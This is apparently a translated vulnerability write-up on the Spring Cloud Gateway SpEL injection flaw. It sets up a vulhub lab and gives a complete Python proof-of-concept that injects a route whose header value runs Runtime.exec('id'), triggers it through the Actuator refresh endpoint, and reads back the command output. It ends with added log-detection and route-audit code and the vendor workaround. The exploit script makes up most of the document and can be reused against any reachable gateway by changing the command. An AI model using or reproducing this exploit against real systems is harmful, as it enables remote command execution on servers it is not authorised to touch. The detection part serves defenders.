Introduction:
Spring Cloud Gateway is an API gateway in the Spring ecosystem. Versions 3.1.0 and 3.0.6 and earlier (inclusive) contain a SpEL expression injection vulnerability: when an attacker can reach the Actuator API, the flaw can be used to execute arbitrary commands.
Vulnerable environment:

```shell
docker run -d -p 8080:8080 vulhub/spring-cloud-gateway:3.1.0
```
Visit port 8080:
![notion image](https://www.notion.so/image/https%3A%2F%2Fs1.ax1x.com%2F2022%2F03%2F26%2FqamvHf.png?table=block&id=191ca453-491c-4ac1-a060-2de147bac1a0&cache=v2)
POC:

```python
import requests
import json
import re

print("cve")
url_host = input("请输入要测试的地址:")

# Route definition whose AddResponseHeader filter value is a SpEL template;
# the gateway evaluates it once the routes are refreshed.
data = {
    "id": "hacktest",
    "filters": [{
        "name": "AddResponseHeader",
        "args": {
            "name": "Result",
            "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
        }
    }],
    "uri": "http://example.com"
}

UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'
json_headers = {
    'User-Agent': UA,
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Connection': 'close',
    'Accept': '*/*',
    'Accept-Language': 'en',
}
form_headers = {
    'User-Agent': UA,
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close',
    'Content-Length': '0',
    'Accept': '*/*',
    'Accept-Language': 'en',
}

# Add the route
try:
    url = url_host + "/actuator/gateway/routes/hacktest"
    res = requests.post(url=url, data=json.dumps(data), headers=json_headers)
    print(res.text)
    print(res.status_code)
except Exception as e:
    print("输入地址有误请重试")
    exit(1)

# Refresh the routes so the new definition is applied
url = url_host + "/actuator/gateway/refresh"
res = requests.post(url=url, headers=form_headers)
print(res.text)
print(res.status_code)

# Read the route back; the evaluated expression is returned inside the filter definition
url = url_host + "/actuator/gateway/routes/hacktest"
try:
    res = requests.get(url=url, headers=form_headers)
    print(res.text)
    # e.g. [[AddResponseHeader Result = 'uid=0(root) gid=0(root) groups=0(root)'], order = 1]
    print(re.search(r".*AddResponseHeader Result =(.*)", res.json()["filters"][0]).group(1).replace("'", ""))
    print(res.status_code)
except Exception as e:
    print("漏洞不存在")
    exit(1)

# Delete the route
url = url_host + "/actuator/gateway/routes/hacktest"
res = requests.delete(url=url, headers=form_headers)
print(res.text)
print(res.status_code)

# Final step: refresh the routes again so the deleted route is gone
url = url_host + "/actuator/gateway/refresh"
res = requests.post(url=url, headers=form_headers)
print(res.text)
print(res.status_code)
print("存在漏洞")
```
If the id command is executed, the vulnerability is present; otherwise it is not.
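As an added defender-side example (not part of the original post), the Python below flags, in constructed access-log lines, a client that writes a gateway route and then calls refresh, which is the request pairing the PoC above depends on, and audits a submitted route body for SpEL `#{` templates in filter arguments. The log line format, the sample route body and the function names are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (client method path status); the
# second client performs the create / refresh / read / delete / refresh
# sequence of the PoC above.
SAMPLE_LOG = """\
10.0.0.5 GET /actuator/health 200
10.0.0.9 POST /actuator/gateway/routes/hacktest 201
10.0.0.9 POST /actuator/gateway/refresh 200
10.0.0.9 GET /actuator/gateway/routes/hacktest 200
10.0.0.9 DELETE /actuator/gateway/routes/hacktest 200
10.0.0.9 POST /actuator/gateway/refresh 200
"""

# Constructed route body in the shape the PoC submits, with a harmless SpEL template.
SAMPLE_ROUTE = {
    "id": "hacktest",
    "filters": [{"name": "AddResponseHeader",
                 "args": {"name": "Result", "value": "#{'probe'}"}}],
    "uri": "http://example.com",
}

LOG_RE = re.compile(r"^(\S+) (GET|POST|PUT|DELETE) (\S+) (\d{3})$")
ROUTE_WRITE_RE = re.compile(r"^/actuator/gateway/routes/[^/]+$")
SPEL_RE = re.compile(r"#\{")

def suspicious_clients(log_text):
    """Clients that wrote (POST/PUT/DELETE) a gateway route and then called
    refresh. That pairing is what makes an injected route live, and it is
    rare outside deliberate administration of the gateway."""
    wrote_route = defaultdict(bool)
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, _status = m.groups()
        if method in ("POST", "PUT", "DELETE") and ROUTE_WRITE_RE.match(path):
            wrote_route[client] = True
        elif path == "/actuator/gateway/refresh" and wrote_route[client]:
            if client not in flagged:
                flagged.append(client)
    return flagged

def spel_filters(route):
    """Names of filters whose args contain a '#{' SpEL template."""
    return [f.get("name") for f in route.get("filters", [])
            if any(isinstance(v, str) and SPEL_RE.search(v)
                   for v in f.get("args", {}).values())]
```

Where the Actuator gateway endpoint is not needed, the Spring advisory's workaround is to disable it (`management.endpoint.gateway.enabled=false`); the detection above is for deployments that must keep it reachable.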
When sending a JSON request with Python's requests module, first convert the dict to a JSON string with json.dumps before sending; the keys and values of the Python dict should all be strings.